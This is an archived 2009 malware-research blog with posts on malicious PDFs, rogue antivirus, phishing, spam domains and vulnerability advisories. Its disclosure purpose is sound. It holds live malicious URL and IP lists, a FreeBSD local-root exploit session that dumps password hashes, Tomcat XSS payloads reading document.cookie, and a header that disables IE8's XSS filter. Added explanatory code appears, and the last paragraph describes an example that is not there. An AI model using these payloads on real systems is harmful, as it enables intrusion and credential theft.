Tuesday, December 29, 2009

Miekiemoes named in malicious crafted PDF, with TrojanDropper:Win32/Microjoin.gen!B

While searching Google for the malicious footprint code shown below, I found that lots of malicious sites can be located using this code.

One of the malicious sites is the porn site "teensxtube.com"; visiting it, you will notice that the following internet connections are established:

http://teensxtube.com/
http://teensxtube.com/wp.js
http://teensxtube.com/extra/sheduler.php
http://teensxtube.com/extra/count.php?gr=4
http://teensxtube.com/extra/count.php?gr=88
http://eccinput.com/rstat.htm
http://teensxtube.com/1.jpg
http://homesiteuk.com/index.php
http://eccinput.com/r/cnt-gif1x1.php?e=1600.1200&d=32&r=http%3A//teensxtube.com/&p=http%3A//eccinput.com/rstat.htm&t=
http://homesiteuk.com/x.x
http://homesiteuk.com//load.php?spl=mdac (VT 5/41); ThreatExpert Report
http://homesiteuk.com/index.php?spl=2&br=MSIE&vers=6.0&s=
http://homesiteuk.com//pdf.php
http://homesiteuk.com/index.php?spl=3&br=MSIE&vers=6.0&s=
http://saloongins.net/nop/tds2.php
http://autouploaders.net/mass/tds2.php
http://settopworld.net/incallspa.php
http://greatinstant.net/yourseekerz.php
http://getgreatguide.in/s/exx.php
http://promotds.com/in.cgi?16
http://promotds.com/in.cgi?6
http://trenublo.com/estplanete.php
http://getgreatguide.in/search.php?qq=young%20tight%20ass
http://teenbestmovie.com/pi.php
http://getgreatguide.in/s/exx.php
http://getgreatguide.in/search.php?qq=allure%20amateur%20paige
http://getgreatguide.in/search.php?qq=lesbian%20teen%20site%20myspace%20com
http://fuckthisteen.net/pi.php
http://teenbestmovie.com/index2.php
http://fuckthisteen.net/index2.php
http://bestwebtop.net/estvirtuel.php
http://getgreatguide.net/s/exx.php
http://www.unseencontent.com/
http://www.unseencontent.com/cgi-bin/atx/out.cgi?l=o
http://213.174.143.196/v/cj.php?d=80
http://topfuckmovies.net/
http://greattaby.com/addlinkworld.php
http://findyourlink.net/s/exx_new.php
http://findyourlink.net/search.php?qq=free%20gay%20guy%20sex%20video
http://fuckthisteen.net/out.php?t=3.0.2.178&url=http://www.campsnatch.com/hosted/index.php?ws/valik/teenybopperclub_mov500&s=2
http://cafebarplaza.cn/mostextra.php
http://tofindhomes.in/s/exx.php
http://tofindhomes.in/se.php?qq=hardcore%20big%20dick%20sex
http://settopworld.net/greattab.php
http://themiddel.com/s/exx.php
http://themiddel.com/search.php?qq=buy+soma+online
http://greatinstant.net/therealabc.php
http://themiddel.com/s/exx.php
http://themiddel.com/search.php?qq=buy+lipitor
http://trenublo.com/topext.php
http://findyourlink.net/s/exx_new.php
http://findyourlink.net/search.php?qq=cock%20first%20her%20massive
http://navigateguide.com/s/exx_new.php
http://navigateguide.com/search.php?qq=ebony%20free%20model%20pic%20woman
http://adprotraffic.com/asm.js?id=22592


http://homesiteuk.com//pdf.php served the malicious PDF; below is the decoded stream captured from it.

It seems there is another layer of code that needs to be decoded. Not surprisingly, you get the actual code after replacing "kru pop 32" with "%".

Obviously, the analyst will get Unicode after decoding with the UCS method: http://homesiteuk.com//load.php?spl=pdf_0day
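
The two decoding steps just described (putting "%" back in place of the custom token, then decoding the %uXXXX escapes the script hands to unescape()), as an added Python example that is not the post's own code. The captured stream is not reproduced here: SAMPLE is constructed by applying the token substitution to a harmless percent-encoded script, and its URL is a placeholder.

```python
"""Decode the two obfuscation layers described above: a custom token standing
in for '%' on top of ordinary percent-encoding, and JavaScript-style %uXXXX
(UCS-2) escapes in the string handed to unescape() underneath.
Added example, not the post's own code or the real payload: SAMPLE below is
constructed by applying the token substitution to a harmless script."""
import re
import struct
import urllib.parse

# The token the post says stands in for "%" in this sample.
TOKEN = "kru pop 32"

# Constructed stand-in for the captured stream: a percent-encoded script with
# every "%" replaced by TOKEN. The URL is a placeholder, not the real one.
SAMPLE = ("var%20url%3D%22http%3A//example.invalid/load.php%3Fspl%3Dtest%22%3B"
          "var%20sc%3Dunescape%28%22%25u9090%25uE8FC%22%29%3B").replace("%", TOKEN)


def strip_token_layer(blob: str, token: str = TOKEN) -> str:
    """Layer 1: put the '%' back and percent-decode. %uXXXX sequences survive
    untouched because unquote() only understands %XX pairs."""
    return urllib.parse.unquote(blob.replace(token, "%"))


def decode_ucs_escapes(js_string: str) -> bytes:
    """Layer 2: turn a %uXXXX/%XX escaped string into the bytes unescape()
    would produce in memory (each %uXXXX becomes a little-endian 16-bit unit)."""
    out = bytearray()
    pos = 0
    for m in re.finditer(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", js_string):
        out += js_string[pos:m.start()].encode("latin-1")
        if m.group(1):
            out += struct.pack("<H", int(m.group(1), 16))
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    out += js_string[pos:].encode("latin-1")
    return bytes(out)


def extract_urls(text: str) -> list:
    """Pull http(s) URLs out of the decoded script (the next-stage download)."""
    return re.findall(r"https?://[\w./?=&%-]+", text)


def analyze(blob: str) -> dict:
    """Run both layers and report what an analyst wants: the clear-text script,
    any embedded URLs, and the decoded bytes passed to unescape()."""
    js = strip_token_layer(blob)
    m = re.search(r'unescape\("([^"]*)"\)', js)
    shellcode = decode_ucs_escapes(m.group(1)) if m else b""
    return {"js": js, "urls": extract_urls(js), "shellcode": shellcode}


if __name__ == "__main__":
    report = analyze(SAMPLE)
    print(report["js"])
    print("urls:", report["urls"])
    print("unescape() bytes:", report["shellcode"].hex())
```

Order matters: the token layer must come off first, because the %uXXXX escapes only exist inside the string that the clear-text script passes to unescape(), and urllib's unquote() leaves them alone since "%u" is not a hex pair.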

According to ThreatExpert, this malware is categorized as a Trojan Dropper and has Zbot characteristics. It steals personal and financial information. Besides that, it also generates lots of traffic out to other porn websites.

Following generated connections:

autouploaders.net
saloongins.net
settopworld.net
greatinstant.net
trenublo.com
bestwebtop.net
greattaby.com
cafebarplaza.cn
discoverany.cn
d45648675.cn
moretds.in

From the malicious crafted PDF file, one interesting thing I noticed is "/Author (Miekiemoes)".

Miekiemoes is Assistant Director of Research at Malwarebytes, according to miekiemoes.blogspot.com.

It seems someone is joking with her! :-)

Wednesday, December 23, 2009

Security Tool Rogue Antivirus

Visiting a compromised website with a vulnerable IE browser ended with a rogue anti-virus installed on my virtual system. As usual, the rogue anti-virus performs a scan of the system while alerting with fake messages, and users end up tricked into purchasing the rogue anti-virus online.

It will redirect to "sodanthu.com/in6.php".

A few domains and IP addresses used to download the payloads:
sodanthu.com - 76.186.201.167
domoktov.com - 122.115.63.19
bodyscanfit.com - 95.143.192.197
93.178.16.243
67.8.103.165
115.23.132.150
72.189.62.203
remotepaybill.com - 72.233.65.202
58.180.228.103
noloid.com - 82.38.177.107

Basically there are two executable payload files downloaded, with low AV detection rates:
- load.exe 11/40 (sha1:f1b4fc1e56c9e129e83f3139b54dc9b26c481769) VT, ThreatExpert
- 78_wcap.exe 16/40 (sha1:a142cb266ad6cd764501981f6bb194025b7c8cc8) VT, ThreatExpert

"load.exe" then requests another two payloads from the following URLs:
- http://95.211.8.217/pr/pic/test_vorogpa_b.exe (Netherlands)
- http://213.108.56.140/pr/pic/mode.exe (Russian Federation)

- test_vorogpa_b.exe 8/41 (sha1:77e476b0f93241d7fd4c96a93b2aaf51c0b7283c) VT, ThreatExpert
- mode.exe 8/41 (sha1:bd53d7a738a4eb7b208441772312c0a980f6c9d5) VT, ThreatExpert

Other than that, the following host names were requested from the host database:

93.178.16.243 Saudi Arabia
99.172.145.27 United States
70.136.99.45 United States
58.180.228.103 Korea, Republic Of
69.133.52.228 United States
98.150.16.40 United States
116.32.243.20 Korea, Republic Of
121.133.154.145 Korea, Republic Of
65.36.21.142 United States
67.8.103.165 United States
68.63.4.110 United States
115.23.132.150 Korea, Republic Of
211.212.234.198 Korea, Republic Of
189.39.157.223 Brazil
72.189.139.203 United States
200.59.9.82 Argentina
119.207.4.172 Korea, Republic Of
115.136.188.114 Korea, Republic Of
221.161.156.247 Korea, Republic Of
72.189.62.203 United States
152.1.90.107 United States
86.104.133.94 Romania
67.191.95.170 United States
112.170.209.51 Korea, Republic Of
189.41.94.209 Brazil
221.145.69.122 Korea, Republic Of
82.139.32.75 Poland
210.96.149.10 Korea, Republic Of
89.33.184.138 Romania
114.42.119.236 Taiwan, Province Of China
220.88.62.193 Korea, Republic Of
112.164.231.195 Korea, Republic Of
67.66.92.186 United States
192.35.222.23 United States
98.239.53.112 United States
211.56.233.178 Korea, Republic Of
98.204.223.239 United States
92.100.238.0 Russian Federation
162.105.113.88 China
121.182.163.238 Korea, Republic Of
200.79.216.225 Mexico
98.225.215.185 United States
67.160.46.239 United States
89.110.12.115 Russian Federation
98.224.160.221 United States
97.85.189.53 United States
76.237.5.121 United States
58.168.116.29 Australia
76.179.11.105 United States
70.126.56.149 United States
193.151.59.190 Ukraine
200.7.166.145 Bolivia
24.92.178.72 United States
88.216.25.114 Lithuania
99.232.235.89 Canada
115.43.186.103 Taiwan, Province Of China
118.42.212.181 Korea, Republic Of
121.185.21.213 Korea, Republic Of
121.174.84.123 Korea, Republic Of
68.69.204.104 Canada
61.58.111.158 Taiwan, Province Of China
94.54.195.12 Turkey
201.13.94.177 Brazil
121.145.43.209 Korea, Republic Of
188.97.120.80 Germany
80.216.136.246 Sweden
85.67.63.112 Hungary
70.235.17.227 United States
221.143.60.99 Korea, Republic Of
87.7.150.120 Italy
193.110.77.60 Ukraine
93.80.33.215 Russian Federation
67.49.12.244 United States
121.1.71.38 Korea, Republic Of
87.10.29.149 Italy
121.159.139.134 Korea, Republic Of
84.125.210.129 Spain
125.178.173.231 Korea, Republic Of
93.126.104.158 Ukraine
128.130.56.33 Austria
129.22.80.237 United States
220.116.89.236 Korea, Republic Of
24.42.76.57 United States
98.30.33.240 United States
84.3.94.38 Hungary
121.164.68.74 Korea, Republic Of
24.132.52.67 Netherlands
83.85.192.248 Netherlands
70.121.202.156 United States
64.246.85.154 United States
67.187.153.18 United States
98.240.224.97 United States
152.1.40.235 United States
79.9.35.42 Italy
69.204.254.166 United States
121.217.36.61 Australia
24.238.162.9 United States
121.128.195.90 Korea, Republic Of
109.60.245.57 Italy
119.64.109.187 Korea, Republic Of

Tuesday, December 22, 2009

World Of Warcraft Phishing Website

World of Warcraft (WoW) players should be on the lookout for phishing sites trying to get their user info.

Be careful with this link.

Malaysia Property Company Defaced, www.metrolink.com.my

A reader sent me an email asking me to post about the defacement of Metrolink.com.my; this website provides a full range of property services in Malaysia, including sales, rentals, project development launches, etc.

Before defacement:

After defacement:

Thanks to my reader!

Brittany Murphy's Death SEO Poisoning Among Security Vendors

The sudden death of Hollywood celebrity Brittany Murphy at age 32 last weekend really got the bad guys interested in launching SEO poisoning of search results. This bad news drives lots of users' curiosity and turns them into scareware victims. Because of this incident, several articles about Brittany Murphy were posted by security vendors on their public blogs.

Websense - Brittany Murphy's Death SEO Poisoning
F-Secure - Brittany Murphy SEO
Trendmicro - News on Brittany Murphy's Death Lead to FAKEAV
McAfee - Brittany Murphy Searching Dangers

Although the whole world is in the Christmas mood, the bad guys never stop building their money-making nest. :)

Monday, December 21, 2009

Viagra & EuroSoft Promotion Spamming For Christmas

Spamming links:

http://www.zhdfght.com/
http://www.piyamcy.cn
http://prettymoral.com
http://www.ingobdue.cn
http://nvaecs.angelfire.com
http://ienroller.angelfire.com
http://www.iwxkugue.cn
http://e10bee.suyivoqiw.cn/
http://biznews7.org/news
http://cid-a97391e298c94785.spaces.live.com
http://f2a63275.wejowafob.cn/
http://6a38a4.zehaqomay.cn/
http://97305a2a71.sudugefon.cn/
http://c301d1b3f9f7.vasesomer.cn/
http://30319b.bitapacoh.cn/
http://50386a9.rihogagox.cn/
http://cid-3e4630a031e273ff.spaces.live.com/
http://www.rxultimatespell.com/
http://f62db.xamobejep.cn/
http://moonnake.net/
http://11knife.ru/
http://001c2f.bapunat.cn/
http://1a68d3b7.hiyusev.cn/
http://now.to/5xt7
http://e5c8.cohuzkp.cn/
http://7e5629c7.jisurim.cn/
http://1680.cevupxn.cn/
http://bca.vocimtf.cn/
http://www.pharmlorens61.cn/
http://284c62d3.tabuhhh.cn/
http://dfe6.cetitgv.cn/
http://oskjcjed.cn/
http://89a.yomepmm.cn/
http://55a1.qofezgk.cn/
http://www.goziywb.cn/
http://fd78.yiruxgl.cn/
http://zokxfde.cn/
http://c3ceea7bf5.huweynf.cn/



http://kloperesofes.net/
http://sruisorehoes.net/
http://koperdinoses.com/
http://xirobenasoes.com/
http://ziopraventoes.com/
http://irgalometrices.com/

Fuckbook invitation in email

Just an update: did you guys receive tons of spam emails regarding "FuckBook Invite #xxxxxx"? I did receive lots of similar messages.

Suspicious links:

http://nvaecs.angelfire.com
http://ienroller.angelfire.com
http://pcfreehost.tripod.com
http://ecbrowse.tripod.com
http://quickreviews.tripod.com
http://stupsihasi.tripod.com

Thursday, December 17, 2009

Acrobat Zero Day - media.newPlayer(null) CVE-2009-4324

Since last week, the Acrobat zero-day has drawn a lot of attention in the security industry, and the official vendor patch will only be available next year, on 12 Jan 2010.

According to Net-Security, Adobe applications top the list of the four applications identified by US NIST.

The Metasploit Framework has added this zero-day exploit to its latest database:
http://downloads.securityfocus.com/vulnerabilities/exploits/adobe_media_newplayer.rb

Malicious PDF files crafted with this zero-day exploit are in the wild. So, as usual, I recommend everyone be extra vigilant when receiving PDF files over the internet.

Temporary workarounds for Adobe Reader (apply either one):
- Disable JavaScript in Adobe Reader (the "Disable JavaScript" setting).
- Apply the following registry (.reg) file:
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\AcroExch.Document.7]
"EditFlags"=hex:00,00,00,00


- Look for an alternative PDF reader available on the market.
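
Static triage of a PDF for the indicators discussed in this post and in the Miekiemoes PDF post above (JavaScript and automatic actions, the media.newPlayer call, %u-encoded strings, and the /Author field), as an added Python example that is not the post's own tooling. It inflates FlateDecode streams before searching, so indicators hidden inside compressed objects are seen too. The PDF it scans is constructed by build_sample_pdf() inside the script, not a real sample, and the indicator lists are my own triage choices.

```python
"""Static triage of a PDF for the indicators discussed in this post and in the
Miekiemoes PDF post above: JavaScript and automatic actions, the
media.newPlayer call of CVE-2009-4324, %u-encoded strings, and the /Author
field. Added example, not the post's own tooling. FlateDecode streams are
inflated first so indicators inside compressed objects are seen too; the PDF
scanned below is constructed by build_sample_pdf(), not a real sample."""
import re
import zlib

# Indicator lists are my own triage choices, not from the post.
SUSPICIOUS_NAMES = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch"]
SUSPICIOUS_STRINGS = [b"media.newPlayer", b"unescape(", b"%u"]

# A stream object: its dictionary (no nested "<<" inside) followed by the body.
_STREAM_RE = re.compile(rb"(<<(?:(?!<<).)*?>>)\s*stream\r?\n(.*?)\r?\nendstream", re.S)


def inflate_streams(pdf: bytes) -> bytes:
    """Replace every FlateDecode stream body with its inflated content.
    Streams that are not Flate, or that fail to inflate, are left as they are."""
    def _inflate(m):
        if b"/FlateDecode" not in m.group(1):
            return m.group(0)
        try:
            # decompressobj tolerates a truncated trailer, unlike zlib.decompress
            data = zlib.decompressobj().decompress(m.group(2))
        except zlib.error:
            return m.group(0)
        return m.group(1) + b"\nstream\n" + data + b"\nendstream"
    return _STREAM_RE.sub(_inflate, pdf)


def triage(pdf: bytes) -> dict:
    """Inflate, then report which indicators are present and the /Author."""
    flat = inflate_streams(pdf)
    hits = [n.decode() for n in SUSPICIOUS_NAMES
            if re.search(re.escape(n) + rb"(?![A-Za-z])", flat)]
    hits += [s.decode() for s in SUSPICIOUS_STRINGS if s in flat]
    author = re.search(rb"/Author\s*\(([^)]*)\)", flat)
    return {"indicators": hits,
            "author": author.group(1).decode("latin-1") if author else None,
            "score": len(hits)}


def build_sample_pdf(js: bytes, author: bytes = b"Sample Author") -> bytes:
    """Constructed minimal PDF: an /OpenAction JavaScript whose code lives in a
    Flate-compressed stream, plus an /Info dictionary carrying /Author.
    Simplified layout (no xref table), sufficient for the triage regexes."""
    body = zlib.compress(js)
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
            b"4 0 obj << /Length " + str(len(body)).encode()
            + b" /Filter /FlateDecode >>\nstream\n" + body + b"\nendstream\nendobj\n"
            b"5 0 obj << /Author (" + author + b") >> endobj\n"
            b"trailer << /Root 1 0 R /Info 5 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    sample = build_sample_pdf(b'var sc = unescape("%u9090"); media.newPlayer(null);')
    print(triage(sample))
```

Searching the raw file alone would miss everything in the compressed stream; that is why the sample puts the script behind /FlateDecode, the same way real droppers hide their JavaScript. A /JavaScript or /OpenAction hit on its own is not proof of malice, which is why the result carries the individual indicators rather than only a score.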

Rogue Antivirus - Advanced Virus Remover & PC-Scanner2010.com

Browsing to the link hxxxp://pc-scanner2010.com prompts a scare message that tricks users into downloading the rogue antivirus.

hxxxp://advanced-virusremover-2010.com

IP address: 193.104.110.50

advanced-virus-remover-2009.com
advanced-virusremover-2010.com
advanced-virusremover2009.com
avrdownnew5.com
avrdownnew6.com
avrdownnew7.com
avrdownnew8.com
avrdownnew9.com
buy-internet-security2010.com
buy-internetsecurity2010.com
downloadavr13.com
greatcrypt.com
mail.avrdownnew9.com
mail.buy-internet-security2010.com
mail.buy-internetsecurity2010.com
mail.masterhost.co.in
mail.pc-scanner-2011.biz
mail.pc-scanner-2012.net
mail.pc-scanner2010.com
masterhost.co.in
ns1.masterhost.co.in
pc-scanner-2011.biz
pc-scanner-2012.net
pc-scanner2010.com
vsproject.net
www.advanced-virus-remover-2009.com
xxx-white-tube.net

IP Address: 91.207.116.55

10-open-davinci.com
advancedvirus-remover-2010.com
advancedvirusremover-2009.com
best-scan-pc.biz
best-scan-pc.com
best-scan.com
best-scanpc.com
best-scanpc.net
best-scanpc.org
coolcount2.com
downloadavr6.com
downloadavr8.com
hard-xxx-tube.com
mail.10-open-davinci.com
mail.advanced-virus-remover-2009.com
mail.advanced-virus-remover2010.com
mail.advanced-virusremover-2010.com
mail.advanced-virusremover2009.com
mail.advancedvirus-remover-2010.com
mail.advancedvirusremover-2009.com
mail.best-scan-pc.com
mail.best-scan-pc.net
mail.best-scan.com
mail.best-scan.net
mail.best-scanpc.org
mail.cathrynzfunz.com
mail.coolcount1.com
mail.downloadavr6.com
mail.downloadavr7.com
mail.downloadavr8.com
mail.greatcrypt.com
mail.hard-xxx-tube.com
mail.testavrdown.com
mail.testavrdownnew.com
mail.vscodec-pro.net
mail.vsproject.net
mail.xxx-white-tube.net
mail.xxx-white-tube.org
testavrdownnew.com
vscodec-pro.net
white-xxx-tube.com
www.advancedvirus-remover2009.com
www.advancedvirusremover-2009.com
www.best-scan-pc.com
www.best-scanpc.net
www.best-scanpc.org
www.hard-xxx-tube.com
www.onlinescanxppro.com

Wednesday, December 16, 2009

FIESTA botnet dominance at Vietnam and India

Recently I found what I believe is a FIESTA control panel kit, which showed victims mainly from Vietnam and India, although the scale of infected systems is small compared to Zeus, Rustock, etc. I strongly believe this control panel kit is just the tip of the iceberg within the "botnet" families.

From figure 1, I can summarize that XP "SP1" dominates the victim systems compared to Vista, SP2, 2k and 2k3. It is not surprising that many internet users are still using SP1 although SP2 and SP3 were released a few years ago.

Among the infected systems, the Firefox browser leads the other browsers used to surf the internet.

Figure 2 shows the list of possible "Luckysploit" exploit attempts on victim systems, consisting of COM, MDAC, XML Parsing, Snapshot, WFI, PDF, VML2, FF behavior and NCT.

The downloaded executable file gets a minor detection rate on VirusTotal, and the ThreatExpert report can be reviewed at http://www.threatexpert.com/report.aspx?md5=0095da1c241cb9056b67425dab3d7283

Monday, December 14, 2009

Rogue Antivirus- Internet Security 2010

Internet Security 2010 is another phony security product that looks similar to legitimate security software.

Rogue software usually uses scare tactics, tricking users with false warnings and alerts into buying the product.

Installer "IS2010.exe"
MD5: 0x3199C032F173066DD0E9DB1E7D3C2F67
SHA-1: 0x761B2E2C291527196B920CFD29480422854CD523
File size: 1,414,656 bytes

http://www.threatexpert.com/report.aspx?md5=3199c032f173066dd0e9db1e7d3c2f67

Another rogue security software website shares the same IP address as "Internet Security 2010".

Below is a screenshot that copies the legitimate CleanMyPC Registry Cleaner exactly.

The legitimate website is http://www.registry-cleaner.net/ with IP 66.39.16.135. Be aware if an incorrect web link appears in the browser address bar.

Phishing - Fake Facebook

Be cautious when you log in to the famous social networking portal "Facebook" through a page like the figure below; if you look at the address bar carefully, it is actually a Facebook phishing site.

Figure 2 shows the usernames and passwords used to log in to "Facebook". Several accounts were recorded by that fake "Facebook".

If you suspect your Facebook account has been compromised, change the password immediately.

Figure 1:

Figure 2:
IP address:
66.45.237.212
69.10.48.106

Domains sharing same IP address:

05748.t35.com
3sbe.t35.com
accessonlineupdate.t35.com
angelsaddiavolo.t35.com
anggit.t35.com
azitromed.t35.com
banameex-sesion.t35.com
banamex-netkey.t35.com
barnamex.t35.com
bizboost.t35.com
bizbooster.t35.com
bl-lit.t35.com
btrl24.t35.com
demo.t35.com
devilzone.t35.com
dkz1.t35.com
falilat.t35.com
finivest.t35.com
freeware-ad.t35.com
friends09.t35.com
ghhghg.t35.com
jadult.t35.com
meetsaferbuds.t35.com
montagemfotos.t35.com
noriko.t35.com
ns2.t35.com
ogard.t35.com
oijvhalaocp.t35.com
punjat.t35.com
raghil.t35.com
realestateprofiles.t35.com
saadullah.t35.com
spyware-re.t35.com
texas-accountpoker.t35.com
vital.t35.com
wachovlogsinfoonline.t35.com
www.azitromed.t35.com

Tuesday, December 8, 2009

Close IE 8 Cross-Site Scripting (XSS) Filter

As we have the option to turn off the XSS filter functionality in IE 8 (client side), we also have the option to turn it off on the server side by adding an HTTP header.

PHP:
header("X-XSS-Protection: 0");

ASP.NET (web.config):

Reference: http://msdn.microsoft.com/zh-cn/library/dd565647(en-us,VS.85).aspx

Friday, December 4, 2009

FreeBSD local r00t zeroday

Reference source: http://seclists.org/fulldisclosure/2009/Nov/371


** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"

"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.

Example exploiting session
**********************************
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
&:/home/kcope:/bin/sh
#
Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

Spam **05-Dec

IP Address: 82.204.219.218

*.live.smtp.ru
*.michael.smtp.ru
*.msn.live.smtp.ru
*.my-yahoo-register.smtp.ru
*.ndgcx2zh2.smtp.ru
*.olhardigital.smtp.ru
*.smtp.ru
*.system.smtp.ru
*.uk.smtp.ru
*.working.smtp.ru
2a.smtp.ru
accedipostaitalienesslttpacceso.smtp.ru
altenativo2010.smtp.ru
anjodoamor2007.smtp.ru
beatrisadoyy.smtp.ru
blog-fotos-amanda.smtp.ru
blogger1.smtp.ru
cap1.smtp.ru
cocoleg.smtp.ru
computing.system.smtp.ru
finasa.smtp.ru
ftp2.smtp.ru
hsbc.uk.smtp.ru
hussein.working.smtp.ru
kalamazu2008.smtp.ru
lembrancas.michael.smtp.ru
live.smtp.ru
michael.smtp.ru
mikle.smtp.ru
msgss.smtp.ru
msn.live.smtp.ru
my-yahoo-register.smtp.ru
ndgcx2zh2.smtp.ru
node2.mk.pochta.ru
olhardigital.smtp.ru
pozesursa1.smtp.ru
ssl1.smtp.ru
system.smtp.ru
testing.smtp.ru
uk.smtp.ru
vida.smtp.ru
working.smtp.ru
www.altenativo2010.smtp.ru
www.blog-fotos-amanda.smtp.ru
www.finasa.smtp.ru
www.hsbc.uk.smtp.ru
www.msn.live.smtp.ru
www.my-yahoo-register.smtp.ru
www.ndgcx2zh2.smtp.ru
www.olhardigital.smtp.ru

IP Address: 64.62.181.43

*.fileave.com
2a.fileave.com
badkiddies.fileave.com
bandaeva.fileave.com
binuser.fileave.com
camimura.fileave.com
casinhabranca.fileave.com
contempt.fileave.com
ericschevy.fileave.com
finkel.fileave.com
googlevideo.fileave.com
gtemplates.fileave.com
ovhsux.fileave.com
scn2.fileave.com
tikam.fileave.com
trustha.fileave.com
vembebe.fileave.com
xscan.fileave.com
zenka.fileave.com
zzzz.fileave.com


IP Address: 217.116.46.139

*.auszer.hu
*.egylap.hu
*.mail.webmester.net
*.webmester.net
auszer.hu
auto-tuning.hu
boltmix.com
csofek.hu
duoeotvos.com
egylap.hu
hirdet.info
hirdet.net
kezdo.net
kontaktspray.com
kontaktspray.hu
kpeg.hu
lakeinvest.hu
mail.auszer.hu
mail.auto-tuning.hu
mail.csofek.hu
mail.egylap.hu
mail.kemence.net
mail.kpeg.hu
mail.nevjegytar.hu
mail.oxalis.hu
mail.relaxinfra.hu
mail.rudasy.hu
mail.vicc.net
mail.webmester.net
motobatt.info
motor-akku.hu
nevjegytar.hu
ns2.webmester.net
ns3.webmester.net
oxalis.hu
proelektro.info
relaxinfra.hu
root.mail.webmester.net
root.webmester.net
rudasy.hu
tokol.net
tokoliuszoda.hu
vicc.net
webmester.net
wiha.info
www.vicc.net
www.webmester.net


IP Address: 218.93.205.19

*.guarddog2009.com
brans.pl
dl.guarddog2009.com
guarddog2009.com
root.guarddog2009.com
www.brans.pl
www.guarddog2009.com
www.zief.pl
zief.pl

Wednesday, December 2, 2009

Apache Tomcat 404 error Vulnerability

Reference: http://websecurity.com.ua/3114

Vulnerable:

Apache Software Foundation Tomcat 3.2.1
Apache Software Foundation Tomcat 3.2
Apache Software Foundation Tomcat 3.1.1
Apache Software Foundation Tomcat 3.1
Apache Software Foundation Tomcat 3.0

Exploit:
http://www.example.com/?offset=1&cid=1&limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/?offset=1&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/?offset=%3Cscript%3Ealert(document.cookie)%3C/script%3E&cid=1
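
The bug class behind the Tomcat 404 report above (request parameters reflected into an error page without escaping), shown as a vulnerable handler beside its hardened form, plus a check that flags requests whose parameters carry markup. This is an added Python example, not Tomcat's code; the URLs it handles are the example.com proof-of-concept URLs from the post.

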